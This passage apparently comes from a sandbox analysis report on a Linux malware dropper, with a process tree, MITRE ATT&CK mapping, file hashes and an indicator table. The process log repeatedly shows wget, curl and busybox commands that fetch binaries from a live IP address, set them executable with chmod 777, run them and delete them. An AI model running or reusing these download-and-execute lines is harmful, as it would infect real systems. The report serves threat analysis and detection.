./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Executes dropped EXE
PID:954

/bin/rm
rm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:955

/usr/bin/wget
wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:956

/usr/bin/curl
curl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:958

/bin/chmod
chmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- File and Directory Permissions Modification
PID:959

/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Executes dropped EXE
PID:960

/bin/rm
rm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:961

/usr/bin/wget
wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:962

/usr/bin/curl
curl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:964

/bin/chmod
chmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- File and Directory Permissions Modification
PID:965

/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Executes dropped EXE
PID:966

/bin/rm
rm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:967

/usr/bin/wget
wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:968

/usr/bin/curl
curl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:970

/bin/chmod
chmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- File and Directory Permissions Modification
PID:971

/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Executes dropped EXE
PID:972

/bin/rm
rm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:973

/usr/bin/wget
wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:974

/usr/bin/curl
curl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:976

/bin/chmod
chmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- File and Directory Permissions Modification
PID:977

/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Executes dropped EXE
PID:978

/bin/rm
rm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:979

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	738	rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	744	yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	750	jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	776	6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	806	5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	813	kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	819	NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	838	oieViux5SkcOflukQEESWqzwe8qoXmU0do
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	861	rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	870	I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	876	A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	882	SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	888	WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	894	8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	900	rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	906	yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	912	jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	918	kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	924	NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	930	oieViux5SkcOflukQEESWqzwe8qoXmU0do
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	936	6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	942	5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	948	rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	954	SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	960	WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	966	8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	972	I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	978	A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads